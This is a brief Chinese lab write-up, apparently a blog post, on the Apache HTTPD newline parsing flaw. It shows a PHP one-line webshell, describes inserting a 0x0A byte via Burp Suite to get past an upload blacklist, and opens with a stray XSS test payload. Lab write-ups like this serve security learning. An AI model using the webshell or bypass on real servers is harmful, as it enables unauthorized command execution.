<img src=/ onerror=alert(1)>
一.Apache HTTPD 换行解析漏洞
启动环境
进入容器
看一下 index.php文件,发现如果是在黑名单里的会返回bad file。
网页在上传文档这里设置了一个黑名单。
访问网页上传一句话木马:
<?php system($_GET['a']?>
使用burpsuite抓包,转16进制,找到上传文件位置,在其后面增加一个字节0A,放行。
访问我们上传的文件,现在就可以通过对a赋值来进行操作了。
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
